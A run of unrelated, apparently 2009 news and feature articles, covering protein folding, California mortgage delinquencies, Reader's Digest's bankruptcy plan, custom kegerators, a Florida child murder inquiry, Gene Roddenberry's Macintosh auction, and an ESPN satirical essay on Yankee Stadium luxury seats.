So , what 's it all mean ?
Well , in practical terms , if the authors are right , then the protein solving problem — the one that some of you may have been donating your spare CPU and GPU cycles to — may not be as difficult as some might have thought .
If any potential arrangement is possible , then it 's tough to see where an unfolded protein might wind up .
But if we 've really exhausted the biologically relevant fold space already , then the solution to the protein - folding problem would be severely constrained .
In evolutionary terms , the authors suggest the results may support the " Big Bang theory of protein evolution , " which suggests that early life was quickly able to explore most of the useful fold space , and has just been tinkering with variations on them since .
I 'm not entirely convinced it does .
In many cases , only a few key amino acids form the hydrogen bonds and charge interactions that hold a fold together .
It 's easy to imagine that you only have to tweak a few of these to switch from a given fold to something that 's closely related .
But it 's easy to imagine a lot of things ; the authors have n't gone through and determined whether that 's actually true in the cases that their approach has identified .
It 's not even clear that we currently have enough information to do this sort of comparison , given that we'd need to have some measure of all the amino acid combinations compatible with a given fold .
Still , it 's an intriguing idea , and one that fits in nicely with the growing recognition that emergent properties — situations where ensembles of something behave differently from individual instances — may play a significant role in dictating the behavior of natural systems .
If this idea turns out to be right , it 's possible that the diversity of protein structures we see arises simply from the properties of the amino acids they 're comprised of .
PNAS , 2009 .
DOI : 10.1073/pnas.0907683106
Listing image by Argonne National Laboratory
Mortgage delinquencies will continue to rise and set records the rest of this year in California , according to projections to be released today by TransUnion , one of the three big U.S. credit - reporting companies .
The good news from TransUnion ’s number - crunching is that , even in the tarnished Golden State , the trend may finally reverse itself by the middle of next year .
Before that can happen , lenders must first work through scads of backed - up problem loans clogging their pipelines , F.J. Guarrera , vice president for banking at the Chicago data analyzer , said in an interview Monday .
So in the immediate future the percentage of California home loans that are delinquent at least 60 days or are in foreclosure is projected to skyrocket to more than 14 % by year ’s end from 9.7 % as of June 30 , TransUnion said .
Advertisement
In the region including Los Angeles , Orange , Ventura , Riverside and San Bernardino counties , the delinquency rate also was expected to hit 14 % at the end of the year , up from 10.7 % as of June 30 .
“ We think that ’s about as bad as it ’s going to get , ” Guarrera said .
California ’s overall economic picture is worse than that of the country as a whole .
The unemployment rate was 11.9 % in July compared with the nation ’s 9.4 % .
What ’s more , the whipsaw of home prices from the housing boom and bust was exaggerated in California , leaving more borrowers than average “ underwater , ” or owing more than their homes are worth .
It ’s no surprise , then , that the state ’s mortgage woes are far greater than the nation ’s .
At the end of June , 5.8 % of home loans nationally were late 60 days or more , a percentage TransUnion expects to rise to 6.9 % by the end of this year .
Advertisement
The TransUnion data reinforce a report last week from the Mortgage Bankers Assn. on the new records being set for problem home loans .
But the credit - reporting company had more specific regional numbers than the national trade group .
In particular , the situation and the outlook in the Inland Empire are “ kind of staggering , ” Guarrera said .
As of June 30 , 14.9 % of residential mortgages in San Bernardino County were at least 60 days late .
And in Riverside County , where boom - era home building reached a frenzied peak , 16.5 % of home loans were at least 60 days past due .
By comparison , at the end of the first quarter of 2007 , Riverside County ’s delinquency rate was 2.6 % and San Bernardino County ’s , 2.3 % .
Advertisement
The normal national rate for these delinquencies is 1.6 % to 2 % , Guarrera said .
Although California will struggle for the rest of the year , the outlook nationally is brightening a bit , he said .
For example , Ohio , a Rust Belt state where foreclosures surged long before those in California , recorded a lower delinquency rate in the second quarter with 4.57 % of loans in the problem category , down from 4.79 % the previous quarter .
--
scott.reckard@latimes.com
* Company anticipates filing a prearranged bankruptcy plan
* Plans to exchange portion of senior debt for equity
* Bankruptcy financing of $ 150 million committed ( Adds details about restructuring timeline , Ripplewood ownership change , bank debt )
NEW YORK , Aug 17 ( Reuters ) - Reader ’s Digest Association Inc [ RPPLER.UL ] , whose namesake magazine has been a staple of dentists ’ offices for generations , said on Monday it planned to file for Chapter 11 bankruptcy for its U.S. businesses as part of a prearranged plan with lenders to cut debt by 75 percent .
The media company , known worldwide for its family magazine filled with general - interest and inspirational stories , has been trying to cut costs since it was bought in 2007 by an investor group led by Ripplewood Holdings LLC .
The bankruptcy would take the form of a prearranged filing , which comes after a company has already reached deals with lenders to reduce debt .
The deal , if approved by a bankruptcy court , would allow Reader ’s Digest to slash its debt load to $ 550 million , from the current $ 2.2 billion .
The arrangement would also allow the company to reduce its annual interest payments on remaining debt to less than $ 80 million from about $ 145 million , said President and Chief Executive Officer Mary Berner in an interview .
“ Our deal has already been negotiated and hammered out with a majority of our creditors , ” said Berner .
The arrangement “ does n’t affect our employees , it does n’t affect the vast majority of vendors , it does n’t mean we ’ll do mass layoffs , it does n’t mean we ’re going to be selling off assets .
It ’s business as usual . ”
Reader ’s Digest , based in Pleasantville , New York , has said it is the largest selling magazine in the world .
It has offices in 45 countries and sells books , magazines , recorded music collections and home videos .
Among other offerings , it also publishes food magazine Every Day with Rachael Ray .
BANKRUPTCY PLAN
The company expects to file its petition in bankruptcy court within 15 days , said Chief Financial Officer Thomas Williams , and the company hopes to conclude the restructuring process within 45 to 90 days , said Berner .
The Chapter 11 filing will apply only to the company ’s U.S. businesses .
Operations in Canada , Latin America , Europe , Africa , Asia and Australia - New Zealand will not be affected .
Ripplewood will have no ownership stake going forward either in the United States or internationally .
Reader ’s Digest is the latest media company to be hurt by an economic slowdown that has hampered companies ’ abilities to repay debt .
Print media organizations have struggled to pay down debt over the past year as the U.S. economic recession has cut ad spending and readers have flocked to Internet sites for free news .
Newspaper publisher Tribune Co TRBCQ .PK is among companies that have filed for bankruptcy .
“ I do n’t think this ( announcement ) is unexpected , ” said Stephanie Wickouski , co-vice chair of the corporate restructuring group for law firm Drinker Biddle .
“ The telecom revolution and the appeal of Internet news has put anything in print under tremendous stress . ”
DEBT RESTRUCTURING
Under the plan , the company will work with lenders to swap a portion of its $ 1.6 billion in senior secured debt for equity , and transfer company ownership to the lender group .
The agreement , which is subject to court approval , also includes a commitment from some members of the senior lender group to provide $ 150 million in debtor - in - possession financing , which would help fund operations during the reorganization .
JPMorgan Chase JPM.N will lead the team DIP lenders , said Williams .
Other lenders include GE Capital and Eaton Vance , among others .
Holders of about 60 percent of the dollar value of the bank debt support the proposed restructuring plan , according to a source familiar with the negotiations , who declined to be named since they were not cleared to speak on the matter .
( Reporting by Chelsea Emery , editing by Gerald E. McCormick , Tim Dobbyn , Matthew Lewis and Robert MacMillan )
There ’s something about a giant gadget that dispenses cold beer that inspires people to extremes .
Here at Wired.com we have been busy pimping out our own fridge - turned - kegerator , Beer Robot , and we wanted to pay tribute to the most extreme , tricked - out and awesome kegerators we ’ve come across .
Here are some of our favorites .
The Octane 120
Who knew mixing beer and videogames was such a good idea ?
Apparently a lot of people did , because there are no fewer than three different companies offering combination kegerator / arcades online , and at least one home - made one is in the works .
Even our own Beer Robot has Space Invaders on one side .
Dream Arcade ’s Octane 120 , pictured above , takes top prize in this category for many reasons , but it could be a winner based solely on the fact that it has an “ in dash beer tap . ”
Just in case the tap directly behind you is n’t close enough , you ’ve got one right next to the steering wheel .
You do n’t even have to take your eyes off the road to refill your beer , let alone stand up .
It has a high - output DLP projector , a 120 inch projector screen and comes with your choice of Xbox 360 , PlayStation 3 or a gaming PC .
Dream Arcades owner Mike Ware told Wired.com that the company is adding a removable arcade control panel and 200 classic arcade games , including Pac-man and Centipede .
The seat is adjustable , the steering wheel and shifter are leather - wrapped , the pedals have variable resistance , it can hold a full - size keg or two five - gallon kegs and , of course , there is a conveniently located drink holder directly below the dashboard tap so you can refill mid-game .
Yes please , I ’ll take one of those … if it were n’t for the $ 6,000 price tag .
I ’d be more likely to own an actual car that costs this much .
Not surprisingly , Dream Arcades does not sell a lot of these .
“ This is mainly a high - end toy for CEOs , actors and such , ” Ware wrote in an e-mail to Wired.com .
If you are n’t one of those , perhaps the standup arcade he plans to offer for $ 2,600 in time for Christmas is more your style .
Photo : Dream Arcade
The Woody
This is the most beautiful kegerator we found .
It is the creation of Craig Jones , who converts fridges and sells them as Craigerators .
Each is a one - of - a - kind piece of “ functioning art . ”
“ And what better kind of functioning art could there be but one that dispenses beer ? ”
Craig asks on his website .
We do n’t know , Craig .
We just do n’t know .
Hundreds of hours go into each custom Craigerator .
Craig takes classic fridges , guts , sandblasts and powder coats them , restores the nuts and bolts , replaces the insulation with foam , installs new electrical systems and adds beer dispensing equipment .
His first creation was called the Bone Box and had a real human femur bone for the door handle .
This Craigerator was inspired by the “ Woody ” station wagons of the ’50s that are best known for their part in the ’60s surfing scene .
It was converted from a 1954 GE fridge .
The sides are made of oak , and the mini surfboards on top were custom made .
It has a can of Mr. Zog ’s Sex Wax on the door handle and a surfboard for a tap handle .
It took 18 coats of paint , and even has neon lights that glow from underneath the kegerator .
Craig ’s wife fell in love with this one , and it never made it out the door .
Photo : Craigerator
The Diamond Plate Kegerator Cabinet
Do n’t try to convince anyone that you do n’t need this for your garage .
It is made of steel and aluminum , has wheels welded to it and has a theoretical load capacity of 6,000 pounds .
Just think of what you could keep in there !
Well , a keg of course .
The main attraction of this kegerator is the ( optional ) flatscreen TV .
It can handle screens up to 44 inches wide .
Garage Fabricators says these cabinets are “ built for the person who believes that their garage is not just a place “ to park the car . ”
And who would n’t want a great big TV in their garage ?
You could sit in your car like you were at a theoretical drive - in that serves beer .
The kegerator cabinet will run you $ 1,679 , sans TV , or $ 2,964 with a Sharp 32 ″ LCD HDTV with a DVD player .
For just a few bucks more , you can get the cabinet with red , blue , green , orange or gold trim .
Photo : Garage Fabricators
The Killer Kegerator
Paul
Theiss started with an old fridge with a dead compressor that has been languishing on the back porch .
Instead of junking it , he decided to replace the compressor and give it a second life as his “ Killer Kegerator . ”
Inspired by Craig Jones ’ Craigerators , some of which are pictured in this gallery , he got help on the paint job from a buddy who owns an auto body shop and machined the inner panels and flaming splash plate from sheet aluminum .
“ I installed a dual shank so I can have two flavors , no waiting , ” Theiss said .
Now on tap : Fat Tire Amber Ale and 1554 Enlightened Black Ale , both from New Belgium Brewery in Fort Collins , Colorado .
The project took nine months of sporadic work , including four Saturdays for the paint job , and around $ 600 .
Photo : Paul Theiss
The Juice Box
What ?
You do n’t want beer following you everywhere you go ?
I do n’t get it .
This is the first portable Craigerator , called the Juice Box , and it ’s so sweet that Craig is keeping it for himself .
It has four taps ( though it could fit up to eight ) and can hold ice for two days in 100 - degree weather .
Locking legs allow it to stand on its own outside the truck bed .
The CO2 canisters mount on the back .
It even has an LCD light show .
Craig will make you your own “ kick - ass jockey box ” for $ 2,850 .
He ’ll even modify it to pour a nitrogen stout .
We think this kegerator goes particularly well with the tailgate grill made from a classic 1946 keg , which you can add for $ 700 .
Photo : Craigerator
The Island Kegerator
It ’s very hot in Arizona , which can drive people to do all sorts of crazy things .
Or they build a kegerator .
Wired.com reader Al Christensen wrote in to tell us about his home - made beer dispenser , which was inspired by a desire to have cold beer by the pool .
Only intending to turn an old chest freezer into a kegerator , Christensen soon discovered that his creation was exactly the right height to be a bar counter .
He added a ceramic - tile top , faux - stucco paint to match the house , wheels , fancy skirting , lighting and a power strip ( for the margarita blender of course ) .
“ My neighbors got a real kick out of watching it come together — and emptying it , ” Christensen wrote .
“ I thought I could make a business out of building them — no luck .
I thought I could build them for caterers — no luck .
I drew up some directions thinking I could sell them on eBay for $ 10 as a do - it - yourself project — no luck . ”
I do n’t know about you , but I would totally buy one of these .
Photo : Al Christensen
The Keystone Lights
Though we ’re not big fans of the featured beverage in this kegerator , this has to be the best iPod dock ever .
And we ’re obviously fans of the kegerator + gadget theme — as evidenced by our giant iPhone with an “ app ” that serves cold beer .
Both Keystones are custom kegerators made by Craig Jones .
The one on the left was made for the Keystone Light offices at Coors Brewing Company .
The one on the right was made for a contest winner .
Each took over 300 hours to make .
Photo : Craigerator
The Arkeg
The folks at Allstarcade describe their Arkeg Drink - n - Game system as “ modernly progressive , yet retroactively hip ” and suggest you need it for your “ game room , bachelor pad , fraternity house or even office ! ”
This immediately gets me singing , “ One of these things is not like the other … ” until I remember that we actually do have a kegerator and several gaming systems in the Wired.com office .
So who am I to argue with their marketing strategy ?
The Arkeg can only hold a five - gallon keg , but it does come with 69 classic arcade games including Mortal Kombat , Centipede and Joust .
It has a PC , 24 - inch high - def LCD screen , surround sound with subwoofer , WiFi , DVD player , jukebox , karaoke and a marquee logo that can pulsate to the music .
All this for a cool $ 4,000 .
“ The idea for the Arkeg came after finishing an intense battle on a worn out Street Fighter II machine and pouring a beer from our kegerator , ” Brant Myers , Co-founder of Allstarcade , said in a press release in August .
“ The two separate objects took up so much space , yet went together so perfectly , that it just made sense to try and merge them . ”
It just made sense , indeed .
Photo : Allstarcade
The Kisserator
I ’ve seen a few kegerators dressed up in the home team ’s colors , but this is the first I ’ve found that is dedicated to a band .
This is not the first tribute to KISS that owner Sam Smock has built .
“ I used to collect KISS memorabilia and had my upstairs bathroom decorated with KISS items , ” he said in an e-mail to Wired.com .
“ I even had a KISS album set under clear epoxy on the toilet seat . ”
“ I ’d seen some guys making custom kegerators , ” he said , “ and decided that I could do a KISS one and do it better ! ”
Photo : Sam Smock
The Devil May Care
This hellish kegerator was converted by Craig Jones from a 1953 GE fridge .
It has a dual tap system and can hold two half - size kegs .
It took over 200 hours to create .
This Craigerator ’s candy apple paint has reflective flecks in it , taps are a pitchfork and devil ’s tail and the freezer door is see - through with red neon glowing from within — a play on “ when hell freezes over . ”
Photo : Craigerator
See Also :
( CNN ) --
The news was devastating , the aftermath surreal .
Somer Thompson , 7 , went missing Monday on her way home from school .
Diena Thompson clutched a tissue in her right hand , frequently wiping her eyes as she told reporters that she could n't believe it was her daughter whose body was found in a Georgia landfill .
Her visage revealed the weight of grief and a yearning for justice .
Standing outside her home in Orange Park , Florida , Thompson looked into the camera and , with her voice cracking , sent out a stern warning to her daughter 's killer .
" I want you to know that I will not sleep until this person is found .
I hope they get you and I hope they make you pay for a long , long time .
You do n't take from somebody .
You did n't just take her from me .
You took her from my family , you took her from all these people .
And you do n't do this to a little baby and put my baby in the trash like she 's nothing .
That 's not OK , this is not OK . "
Watch Thompson warn her daughter 's killer »
The body of her daughter , 7 - year - old Somer Thompson , was found in a south Georgia landfill , Clay County , Florida , Sheriff Rick Beseler said Thursday morning .
Nancy Grace
The latest on the investigation into the death of Somer Thompson
HLN 8 pm ET see full schedule »
Authorities on Friday were combing were through a " tremendous mountain " of garbage at the landfill , a sheriff 's spokeswoman said .
Some possible evidence has been removed from the landfill , but authorities wo n't describe what they found , said Mary Justino of the Clay County Sheriff 's Department .
Police have no suspects , she said .
She said other law enforcement teams are focusing on the locale where the child apparently was last seen .
Justino said witnesses , including some children , saw her on the sidewalk in front of a vacant house that is being renovated after a fire .
" Since Monday , we have been trying to figure out who frequents that area , " including anyone working on the home , she said .
Authorities are treating the death as a homicide .
Somer became separated from her siblings and schoolmates on her way home from school in Orange Park , Florida , on Monday .
She was seen in a fight at school before she disappeared , according to a police report released Thursday .
Her 10 - year - old sister told police that Somer had gotten into a fight with another girl at school earlier in the day .
The sister said she brought up the fight while she and her brother walked Somer home from school , and that Somer ran off from them , apparently upset .
The sister said she lost sight of Somer in a group of other kids leaving the school , according to the police report .
The medical examiner in Savannah , Georgia , used dental records to positively identify the body as Somer 's , said Clay County Sheriff 's Office spokeswoman Mary Justino .
Authorities now are turning their full attention to finding the child 's killer .
Beseler held up a map dotted with markers as he said on CNN's " American Morning " that detectives have questioned more than 70 registered sex offenders or predators living within five square miles of Somer 's home .
The landfill where her body was found is near Folkston , Georgia , 55 miles north of where the girl became separated from her schoolmates on her way home from school in Orange Park on Monday .
The sheriff told the girl 's mother Wednesday night that her daughter had been identified .
Thompson , he said , was devastated .
" It was the hardest phone call I 've ever had to make in my life , and I hope I never have to make another one like that , " Beseler said at a Thursday morning news conference .
Watch sheriff announce that girl 's body identified »
Authorities will work to pinpoint where the garbage load that contained the girl 's body came from , Beseler said .
The garbage that was brought into that part of the landfill was collected in the Orange Park area , he had said Wednesday , noting that authorities routinely search garbage when a missing person case has been initiated .
The investigation has now turned into a murder probe .
" There is a child killer on the loose , " the sheriff said .
" I fear for our community until we bring this person in . "
Rewards totaling $ 30,000 have been offered for information leading to the arrest and conviction of whoever is responsible .
CNN 's Maria P. White contributed to this report .
All About Missing Children • Florida • Georgia
A piece of computer and science fiction history will go on auction next month :
An early Macintosh computer , which belonged to Star Trek creator Gene Roddenberry .
The computer , with the serial number F4200NUM0001 , was a gift to Roddenberry from Apple .
Though the computer was earlier believed to be an Macintosh Plus , it is an is an early production Macintosh 128 ( #776 ) .
Despite the 0001 serial number , the computer is not the first one manufactured by Apple , says Profiles in History , an auctioneer of Hollywood memorabilia , which will be taking bids for the computer .
The computer for auction has a 9 - inch display , 3.5 - inch floppy drive and includes the short keyboard , external floppy drive , mouse and padded carrying case with Apple logo .
" Gene Roddenberry 's vision inspired countless people to pursue careers in science and aerospace .
This milestone computer , given to Gene by Apple 's innovators , is a symbol of this synergy , " said Joe Maddalena , president of Profiles in History .
The Mac is expected to fetch between $ 800 to $ 1,200 .
Photos : Profiles in History
* The story has been updated to correct the information initially released by the auction house that the computer was the first Macintosh Plus manufactured by Apple .
*
Plenty of injured animals and pets have received a helping hand from human invention .
Two - month - old Lucky the duckling walking with her new sandal at home in Newport
Credit : PA
OTL : Seats Of Gold
NEW YORK -- I am a man of the people , which is why I generously tipped the guy who shined my shoes in a suite near the home plate of Yankee Stadium .
Actually , that 's a lie .
I did n't tip him .
Why should I ?
He gets to be in the presence of me and my fellow masters of the universe .
Maybe he 'll catch success by osmosis , and that 's tip enough .
Someday , if he works hard , he can grow up to be like me : a man who enjoys a beautiful fall day by spending $ 1,200 of other people 's money on a baseball ticket .
I am the American Dream .
I drink wildly expensive French wine with my ballpark lunch and give half the bottle to the guys slaving away in the kitchen , because generosity toward the working man is a burden I carry with grace .
I order a $ 60 glass of pregame scotch and throw the last swallow away , because backwash is for proletarian strivers .
I seek refuge in the Legends Suite from everyone 's favorite prepositional phrase -- in this economy -- because here , the crash never happened .
Look around .
This place reeks of a bull market .
Here , it is perpetually 2007 , and we are all fat and happy ( though not as fat and not as happy as we will be in a few innings ) .
The waiter comes to my seat , which is three rows from the field , right next to the Yankees dugout .
I 'm close enough to see A - Rod choke .
My throat is dry from making small talk with commoners .
" I want a bottle of Dom and a bag of peanuts , " I say .
It takes a few minutes , but I wait patiently and soon enough I 'm sipping a glass of cold Champagne .
I toast my good fortune .
I 'm not really a fan of either team , or of baseball , for that matter , but I do enjoy food , drink and afternoons of mindless entertainment .
I am in lust , not love .
A guy in front of me orders sushi .
I feel closer to my agrarian roots already .
Hell , yeah .
Take me out to the old ballgame .
AP Photo / Julie Jacobson
There were plenty of empty seats in the Legends area during the regular season .
I spent $ 1,200 and all I got was this lousy sheet of printer paper
OK , OK .
I got a little carried away there .
There are certain questions that should not -- cannot -- be avoided when you 're staring at an empty Champagne bottle in the middle of the afternoon .
Like :
Wright Thompson / ESPN.com
The " ticket , " bought online , was printed out on a home computer .
Why did my baseball seat come with a waiter and a wine list ?
What is somebody like me -- a humble sportswriter -- doing here ?
How did any of this happen ?
Well , it began with a photograph .
You 've seen it .
The new Yankee Stadium .
The House Next To The House That Ruth Built .
The picture showed the most expensive seats empty , with the rest of the stadium packed .
Here , in a single image , was a hopeful sign that a better America would rise from the ashes of our most recent economic fiasco .
Greed , it warned , had consequences .
The empty seats were called the Legends Suite .
One ticket for one game cost up to $ 2,500 .
Of course , for that kind of cash , you got more than just a baseball game : Patrons received concierge service , plus a lavish pregame spread .
They'd be protected from the leering hoi polloi by The Moat -- not a metaphorical divide between the haves and have - nots but an actual wall that separates the Legends from the losers .
Kids without the proper tickets , the team pointed out proudly , would not be allowed down there to beg for autographs .
Two weeks into the season , the Yankees slashed prices .
Now the best seats were going for only $ 1,250 , which helped a little , but there are still empty seats .
Executives from companies that received government bailout money could buy the seats , but could n't risk being photographed in them .
At the end of the year , the team shrunk the Legends Suite by a quarter .
What had happened ?
And what did it mean ?
I wanted to see it for myself , so I went to StubHub and searched until I found a single .
Yankees - Red Sox .
Late September .
Section 14B , Row 4 , Seat 12 .
The seat , including service charges , cost more than my monthly mortgage payment .
I printed the magic " ticket . "
Actually , there was no ticket , nothing to tear , nothing to save for years afterward to show my kids .
For $ 1,200 , I got an 8 - by - 11 - inch piece of printer paper .
The slow death of loyalty
The ticket to the first game at the original Yankee Stadium is small and yellow , about the length of a pack of cigarettes .
There 's a No. 1 inside a circle , but no date .
The price is $ 1.10 , and the ad on the back says " Drink Canada Dry . "
The woman who brought me into this conference room at the National Baseball Hall of Fame slides it out of the case and hands it to me .
It feels like a butterfly in my hands .
There 's no logo .
Not even the name of the team .
Just " American League Baseball Club of New York . "
She pulls out other famous tickets .
There 's one that looks nearly the same , from July 4 , 1939 .
Lou Gehrig Day .
A young man once owned that ticket .
He put it in his wallet after the game , after he heard Gehrig call himself the luckiest man on the face of the earth , and he kept it there .
For 50 years .
When he died , his children found it still tucked away , remarkably preserved .
Most of the Hall 's collection of Yankee Stadium tickets comes when people bring huge stacks of them at once : kids cleaning up after the death of a parent , or an elderly person shedding a lifetime of trinkets while getting ready to die .
Incredible stories of longevity and loyalty live in these stubs .
Tiny facts are scrawled across the backs : the scores , the winning pitchers , the attendance .
Now many fans do n't even get tickets to be torn into a stub .
I did n't .
Maybe it 's just as well .
Fewer people save tickets .
The nicer the tickets got , the less people seemed to want them .
Or maybe it was something else :
The people most likely to treasure something as simple as a ticket stub were n't the people who could afford to buy a ticket .
The tickets are like rings on a tree , showing the small changes in our culture .
A logo appeared stamped on the tickets just after World War II : branding .
The words " Opening Day " appearing when the stadium reopened in 1976 : marketing .
A digital squareness to the letters in the ' 80s : computers .
There 's a final change , an erratic progression , that you notice while thumbing through the tickets .
For decades , the price stays mostly the same .
In 1991 , the most expensive ticket in the stadium was just 11 dollars more than it cost to get into the first game ever , 68 years earlier .
Then the prices start climbing , year by year .
By 2008 , the highest - priced ticket is several hundred dollars more expensive .
The A. Bartlett Giamatti Research Center is empty except for a couple searching old newspaper clippings .
The woman has a familiar face .
She 's Babe Ruth 's granddaughter .
I ask her what she thinks of the new stadium .
" I'm the granddaughter , " she says , " and I ca n't afford it . "
Is Wall Street the villain ?
Well , duh
This brings me to another question :
What took ticket prices so long to skyrocket ?
From the beginning , the Yankees and Wall Street were linked .
The bull market that ultimately led to mad speculation and the Great Depression started in October 1923 , within days of the team winning its first World Series -- in its first season at Yankee Stadium .
Old - money New Yorkers followed the Giants .
The dreamers took the subway from Wall Street to the Bronx , the games timed to the close of the market .
Lavish spending was always part of the new - money ethos of the Street .
Great seats , especially at Yankees games , impressed potential clients .
The secondary market for big games grew outrageous , and , as the team won titles throughout the 1990s , smart fans found they could pay for an entire season by auctioning off a choice game or two to bankers hungry to make a deal .
Good Yankees - Red
Sox tickets could go for as much as $ 2,500 .
Maybe , in hindsight , it seems a little greedy to expect a season of baseball for free .
But smart fans were just following the law of supply and demand .
What could be more American ?
The Yankees made nothing extra off this ticket scalping .
Very uncool .
So , in 1998 , the team created a new front row , called the seats the Legends Boxes , and started charging $ 197.50 per game .
Each year , fans and corporations happily paid the increase , so the prices kept rising .
The Street could n't afford to say no .
Why not ?
If you 're a middle - class sports fan , the answer will make you sick .
AP Photo / Julie Jacobson
An apparently empty section of Legends seats reveals a divide .
Brought low by a midget
We trust the people managing our mutual funds and 401 ( k ) s with the care of our parents and the education of our children .
We work long hours to accumulate enough money to place some of it into the hands of the market .
If you 're like me , you have no idea what happens next .
Here 's a quick Wall Street primer :
In one corner are the sell - side brokers ; across the ring are the buy - side traders .
The traders work for us ; the brokers represent companies that want to sell their stock to the traders .
The ethical way to do this :
Offer a quality product .
This , of course , takes hard work and time and imagination , always in short supply .
Luckily , there 's a simpler way .
AP Photo / Julie Jacobson Yankees shortstop Derek Jeter , who surpassed Lou Gehrig 's 70 - year team hits record this season , might one day be called a legend .
Some fans were priced out of seeing him play .
Bribes .
Or , to put it more delicately :
The sell - side " entertains " the buy - side .
They procure the best theater seats , furnish the best Super Bowl packages , deliver recreational drugs on demand , pay off bookies and , in at least one instance , paid for a wedding .
Prospective clients are flown in private jets to Oregon to play golf , to Augusta to watch golf .
One manager spent so much time on free golf trips he got the nickname " The Owl " -- as in he was seen as rarely as the spotted owl .
The big trips produce big sales .
" You 're getting laid on the first date there , " a trader explained to me .
Inevitably , one group of equity traders -- they worked at Fidelity -- got caught .
The thing that finally brought the whole thing to a close was a 2003 bachelor party for one of the traders .
Everyone heard about it : private jets to Miami , a yacht , a bag of Ecstasy , a warren of rooms at the uber - exclusive Delano Hotel , some hookers , some strippers , some red meat , medium - rare .
Oh , and one midget , named Danny Black , to toss off the boat .
All told , $ 160,000 for a weekend at the beach .
" It was n't like a three - ring circus , " groused the father of the groom , Thomas Bruderman Sr. , to the tabloids at the time .
" It was a nice party .
There was only one dwarf . "
When the Securities and Exchange Commission looked into the midget , the hookers , the drugs , they found something less hilarious but more pervasive : the corrupt culture around tickets .
This is how it works :
A broker wants to sell something , but the trader does n't want to buy it .
So , as happened in May 2002 , a broker sends an e-mail :
Are you aware of a guy who delivers
Yankee tix to your desk faster than me ?
Seller of good size CSCO [ CISCO Systems ] .
In exchange for tickets , the trader orders whatever the broker is selling .
Everybody wins .
The broker gets his sale .
The trader gets his seat behind the dugout .
Well , almost everybody .
You , I 'm afraid , get screwed with your pants on .
Wall Street was not only trifling with our financial future but also driving up ticket prices .
A good limo ride spoiled by guilt
And so , ironically , everyone actually lost because everyone won too much .
Wall Street folks wanted tickets to close deals .
The fans thought they could use Wall Street greed to get something for nothing .
The Yankees figured if someone was making all that money off their product , it should be them .
These are the things I 'm thinking about in the car to the stadium .
By car , of course , I mean black chauffeur - driven limo .
The backseat is comfortable , the air conditioning refreshing and the free bottle of designer water helps wash away my guilt .
The last guy in this car was Alec Baldwin .
I scroll through the XM dial and find a 1988 Grateful Dead show from Oakland .
Peace and love , my brother .
Peace in the backseat of the limo and love for the best seat in the house .
I peer through my blacked - out windows at the poor souls who have to walk or crawl underground to take the subway .
I 'm snapped from my reverie by a question from my driver .
He wants to know what my ticket cost .
I 'm embarrassed to tell him .
Finally , after hemming and hawing , I come out with it , sort of .
( I do n't include the service fees . )
" $ 1,200 , " I say .
His head wheels around .
He stares at me .
I want to crawl under the seat .
I do n't know what a driver in New York makes a month , but I bet , after taxes , it 's about what I 'm spending to see a ballgame .
I 'm going to have to try to avoid reality checks from now on .
My driver does n't look jealous .
He looks disgusted .
" That is too much , " he says .
" You can buy food for two months . "
Julianne Varacchi/ESPN.com and Wright Thompson/ ESPN.com
The dichotomy of the drink -- some people go to the game and drink beer from a plastic cup ; others enjoy fine wine and Champagne .
What were the Yankees thinking ?
In a way , the " ticket " in my pocket is a time machine .
It takes us back to 2007 , when the Legends Suite seemed genius , when the market looked as if it would rise forever .
Christopher Pasatieri / US
Presswire Actual tickets to a game at the new stadium , which opened this season .
Now Wall Street looks a lot different .
Bear Stearns and Lehman Brothers are gone .
Flamboyant spending habits are out of style .
At a recent charity auction , no one bid on a $ 50,000 wine dinner .
Afterward , several people approached the organizer and asked whether they could buy the dinner .
They had wanted it , and had the cash to bid on it , but had n't wanted to raise their hands in front of 500 peers .
A special conference call was arranged to auction the wine .
In the same way , the use of tickets has changed , though it has less to do with the market collapsing and more to do with the Fidelity guys getting busted .
You can probably guess what happened next : a proposed SEC rule governing expenses that could forever alter the way Wall Street entertains .
To get out front of the SEC , many firms have instituted their own internal controls requiring gifts worth more than $ 100 to be reported .
A computer program has been purchased by more than 200 companies that , for the first time , allows statistics to be kept on ticket use , including how much business each one brings in .
So just as companies were trying to limit extravagant spending , the Yankees came out with the most extravagant tickets in the history of sports , designed in part for a group of people who could no longer buy them .
" They killed the golden goose , " a former Bear Stearns guy says .
" When the new prices came out , everybody said , ' Are you kidding ?
We can't even give these to clients . ' "
Why ?
Well , first of all , the sell - side guys now face greater scrutiny about what they can gain by using the tickets .
I talked to one Barclays big shot who explained it like this : " The real issue is : Do you want to go to the trouble of taking your client to the Yankee game when you know your boss has an expectation of what 's supposed to come out of the game that 's different than what the client has .
Before , the firm 's expectations were low because the investment was low and the client 's expectations were low .
Now we 're laying out eight grand on these tickets and you get paid on a 10 percent rate .
That 's 80 grand worth of commissions that needs to get done before you get back to even .
And 80 grand of commissions at 2 cents a square , in the equity business , what 's that , 4 million shares of stock ?
If this client does 4 million shares of stock with you , then you 've made your investment back . "
Second , the buy - side now believes the tickets cost so much that they 'd feel a quid pro quo .
Yankees games went from something small to something like a trip to the Masters .
One buy - sider told me : " I 've been offered really good seats a couple of times , but I have n't taken tickets from a broker in the new stadium .
I 'd feel like I owed the guy . "
One of each , please
The driver lets me off at Gate 4 , and I make my way past four levels of security and two blue smoked - glass walls until I 'm standing at the entrance to the Legends Suite .
The light inside is warm and comforting , like a childhood blanket .
Televisions cover the walls .
If one flat screen is good and two is great , imagine a hundred .
I love it .
Who would n't ?
Of course , therein lies the irony of a populist rant against a place that keeps people out .
Do I approve of Augusta National 's policies ?
No .
Would I accept a membership ?
You bet your ass .
There 's a cavernous yet somehow cozy dining room to my left .
All the food is free .
Should I get the port wine - glazed hanger steak with the sauvignon glaze reduction ?
Maybe the whole roasted chicken with poblano salsa ?
Yes .
Also , a side of the crispy pork belly Brie potato bake , please .
And the sausage with the house - made relish and mustard .
Since I believe in moderation , I pass on the Chilean turbot .
I pass on the eight soups or salads , and the eggplant parm .
Must n't be gauche .
Wright Thompson / ESPN.com
Ballpark fare at the new Yankee Stadium -- Chateauneuf - du - Pape with your sausage .
I order a $ 200 bottle of the 2006 Beaucastel Chateauneuf - du - Pape , a classic French wine from the southern Rhône Valley .
" A bottle ? " asks the waitress .
Yes .
" Just for you ? "
Yes .
" You treat yourself well , " she says .
I 'm not sure she means that as a compliment .
She comes back and mangles the cork , which seems ridiculous for a $ 1,200 ticket , but I let her slide .
Noblesse oblige .
I swirl the wine around in my mouth .
The spicy finish goes well with the hot dog .
Excuse me , the sausage .
From my table , I can see the masses moving back and forth beyond the glass wall .
